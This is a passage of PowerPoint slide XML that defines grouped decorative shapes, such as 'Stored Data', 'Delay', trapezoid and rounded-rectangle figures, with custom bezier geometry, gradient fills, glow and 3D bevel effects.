                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="0"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="50800">
                <a:schemeClr val="bg1">
                  <a:alpha val="2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2671935" y="1503488"/>
              <a:ext cx="1386550" cy="1506594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alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1">
                    <a:alpha val="74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Delay 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="2735708" y="3307844"/>
              <a:ext cx="1259004" cy="451151"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX1" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX2" fmla="*/ 847942 w 847941"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825035"/>
                <a:gd name="connsiteX3" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825035"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825035"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX0" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 892438 w 892438"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 920547 w 920547"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1267622 w 1267622"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 95168 w 1290185"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 519139 w 1290185"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1290185 w 1290185"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 519139 w 1290185"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 55122 w 1290185"/>
                <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 95168 w 1290185"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72607 w 1307667"/>
                <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX1" fmla="*/ 536621 w 1307667"/>
                <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                <a:gd name="connsiteX2" fmla="*/ 1307667 w 1307667"/>
                <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                <a:gd name="connsiteX3" fmla="*/ 536621 w 1307667"/>
                <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                <a:gd name="connsiteX4" fmla="*/ 72604 w 1307667"/>
                <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                <a:gd name="connsiteX5" fmla="*/ 72607 w 1307667"/>
                <a:gd name="connsiteY5" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX0" fmla="*/ 58234 w 1293294"/>
                <a:gd name="connsiteY0" fmla="*/ -1 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 522248 w 1293294"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1293294 w 1293294"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 522248 w 1293294"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 58231 w 1293294"/>
                <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 58234 w 1293294"/>
                <a:gd name="connsiteY5" fmla="*/ -1 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 42588 w 1277648"/>
                <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX1" fmla="*/ 506602 w 1277648"/>
                <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                <a:gd name="connsiteX2" fmla="*/ 1277648 w 1277648"/>
                <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                <a:gd name="connsiteX3" fmla="*/ 506602 w 1277648"/>
                <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                <a:gd name="connsiteX4" fmla="*/ 42585 w 1277648"/>
                <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                <a:gd name="connsiteX5" fmla="*/ 42588 w 1277648"/>
                <a:gd name="connsiteY5" fmla="*/ 1 h 825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77648" h="825038">
                  <a:moveTo>
                    <a:pt x="42588" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="506602" y="2"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="740755" y="2"/>
                    <a:pt x="1277648" y="184693"/>
                    <a:pt x="1277648" y="412520"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1277648" y="640347"/>
                    <a:pt x="740755" y="825038"/>
                    <a:pt x="506602" y="825038"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42585" y="825036"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-10810" y="550025"/>
                    <a:pt x="-17482" y="248315"/>
                    <a:pt x="42588" y="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1"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="51000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="32000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow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6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3124930" y="3941265"/>
              <a:ext cx="480561" cy="1191153"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 30034 h 1104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0561" h="1104621">
                  <a:moveTo>
                    <a:pt x="0" y="30034"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160187" y="-10012"/>
                    <a:pt x="320374" y="-10012"/>
                    <a:pt x="480561" y="30034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="480561" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30034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glow rad="50800">
                <a:schemeClr val="bg1">
                  <a:alpha val="2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Stored Data 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="3284980" y="2889707"/>
              <a:ext cx="160460" cy="825038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 10000"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 10000"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 9759 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6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26" h="10000">
                  <a:moveTo>
                    <a:pt x="3093" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11426" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10505" y="0"/>
                    <a:pt x="8333" y="2239"/>
                    <a:pt x="8333" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8333" y="7761"/>
                    <a:pt x="10505" y="10000"/>
                    <a:pt x="11426" y="10000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3093" y="10000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2172" y="10000"/>
                    <a:pt x="0" y="7761"/>
                    <a:pt x="0" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2239"/>
                    <a:pt x="2172" y="0"/>
                    <a:pt x="3093" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:pattFill prst="narVert">
              <a:fgClr>
                <a:schemeClr val="tx1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Stored Data 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="3284980" y="2889706"/>
              <a:ext cx="160460" cy="825038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 10000"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 10000"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 9759 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6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26" h="10000">
                  <a:moveTo>
                    <a:pt x="3093" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11426" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10505" y="0"/>
                    <a:pt x="8333" y="2239"/>
                    <a:pt x="8333" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8333" y="7761"/>
                    <a:pt x="10505" y="10000"/>
                    <a:pt x="11426" y="10000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3093" y="10000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2172" y="10000"/>
                    <a:pt x="0" y="7761"/>
                    <a:pt x="0" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2239"/>
                    <a:pt x="2172" y="0"/>
                    <a:pt x="3093" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="94000">
                  <a:srgbClr val="1D1D1D">
                    <a:alpha val="16000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="5000">
                  <a:srgbClr val="131313">
                    <a:alpha val="60000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="tx1"/>
                </a:gs>
                <a:gs pos="50500">
                  <a:srgbClr val="262626"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                    <a:alpha val="93000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1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2960628" y="3197416"/>
              <a:ext cx="809164" cy="33019"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                <a:gd name="connsiteY0" fmla="*/ 33372 h 33372"/>
                <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 33372"/>
                <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                <a:gd name="connsiteY2" fmla="*/ 33372 h 33372"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                <a:gd name="connsiteY2" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 824799"/>
                <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX1" fmla="*/ 404308 w 824799"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                <a:gd name="connsiteX2" fmla="*/ 824799 w 824799"/>
                <a:gd name="connsiteY2" fmla="*/ 24102 h 24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24799" h="24102">
                  <a:moveTo>
                    <a:pt x="0" y="24102"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="140163" y="7416"/>
                    <a:pt x="266842" y="0"/>
                    <a:pt x="404308" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="541774" y="0"/>
                    <a:pt x="824799" y="24102"/>
                    <a:pt x="824799" y="24102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w="139700" prst="cross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6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3194770" y="3941265"/>
              <a:ext cx="340880" cy="1191153"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 30034 h 1104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0561" h="1104621">
                  <a:moveTo>
                    <a:pt x="0" y="30034"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160187" y="-10012"/>
                    <a:pt x="320374" y="-10012"/>
                    <a:pt x="480561" y="30034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="480561" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3003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/>
                </a:gs>
                <a:gs pos="50500">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="19000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="27000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="23000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="10800000" scaled="0"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow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ounded Rectangle 39"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3235719" y="4159332"/>
              <a:ext cx="258982" cy="601579"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 29055"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:alpha val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:softEdge rad="0"/>
            </a:effectLst>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d extrusionH="76200" contourW="38100">
              <a:bevelT w="139700" h="139700" prst="divot"/>
              <a:extrusionClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:extrusionClr>
              <a:contourClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="1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ounded Rectangle 40"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3256981" y="4215675"/>
              <a:ext cx="216458" cy="260072"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 26999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50800" h="139700" prst="divot"/>
              <a:extrusionClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:extrusionClr>
              <a:contourClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="1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66051" y="1468555"/>
              <a:ext cx="2198318" cy="227805"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="43" name="Group 42"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5034012" y="4363204"/>
            <a:ext cx="1122431" cy="1879830"/>
            <a:chOff x="2266051" y="1450709"/>
            <a:chExt cx="2198318" cy="3681709"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Rectangle 43"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2266051" y="1468556"/>
              <a:ext cx="2198318" cy="366386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Trapezoid 44"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="2582053" y="1450709"/>
              <a:ext cx="1566316" cy="1686284"/>
            </a:xfrm>
            <a:prstGeom prst="trapezoid">
              <a:avLst>
                <a:gd name="adj" fmla="val 23881"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="74000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="41000">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="74000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="39000">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="67000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="61000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="67000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="bg1">
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="50000">
